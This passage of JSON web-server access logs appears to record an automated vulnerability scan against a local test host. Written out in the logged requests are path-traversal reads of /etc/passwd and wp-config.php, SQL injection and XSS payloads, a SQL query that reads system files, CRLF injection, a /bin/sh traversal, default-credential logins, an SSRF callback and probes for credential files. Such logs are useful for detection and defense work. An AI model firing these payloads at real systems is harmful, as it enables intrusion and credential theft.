AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json/a.css?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"{\x0D\x0A \x22type\x22: \x22bulk\x22,\x0D\x0A \x22source\x22: \x22default\x22,\x0D\x0A \x22args\x22:[\x0D\x0A {\x0D\x0A \x22type\x22: \x22run_sql\x22,\x0D\x0A \x22args\x22: {\x0D\x0A \x22source\x22:\x22default\x22,\x0D\x0A \x22sql\x22:\x22SELECT pg_read_file('/etc/passwd',0,100000);\x22,\x0D\x0A \x22cascade\x22: false,\x0D\x0A \x22read_only\x22: false\x0D\x0A }\x0D\x0A }\x0D\x0A ]\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/query HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"phps_query=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /search HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"SAMLResponse=%22%3E%3Csvg/onload=alert(/29K9NLIdFY19Ne3pIO5HpEl4Wer/)%3E","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jira/secure/Dashboard.jspa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xprober.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"{\x22username\x22:\x22admin\x22,\x22password\x22:\x22public\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/v4/auth HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /go/auth/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"\x0D\x0A\x0D\x0A \x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /os/mxperson HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_netrc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tools/sourceViewer/index.html?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hub/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json/FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/search/*:test=test HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /services/pluginscript/..;/..;/..;/getFavicon?host=ca281d8smpvb9r2g07h0etsfoaq7f3adh.oast.site HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?rest_route=/whm/v3/themesettings HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/search/..%5C..%5C..%5Cconf%5Copenfire.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /errors/errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json/a.js?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sftp-config.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /centreon/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?page_id=2&%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/sms_check.php?param=1%27%20and%20updatexml(1,concat(0x7e,(SELECT%20MD5(1234)),0x7e),1)--%20 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webclient/Login.xhtml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logon/LogonPoint/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"\x0D\x0A\x0D\x0A \x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /meaweb/os/mxperson HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpwiki/index.php/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/deviceInfo?auth=YWRtaW46MTEK HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /solr/admin/cores?wt=json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json/FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/vropspluginui/rest/services/getvcdetails HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/search/*:test=test HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/simple-file-list/includes/ee-downloader.php?eeFile=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /error/error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json/a.ico?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secure/ViewUserHover.jspa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ftpsync.settings HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/initializers/secret_token.rb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0D%0ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.drone.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read%3Csvg%20onload=alert%28document.domain%29%3E?mimeType=text/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backend HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /global-protect/login.esp?user=j%22;-alert(1)-%22x HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logon/LogonPoint/custom.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Default.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /iam/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json/FNZ.png 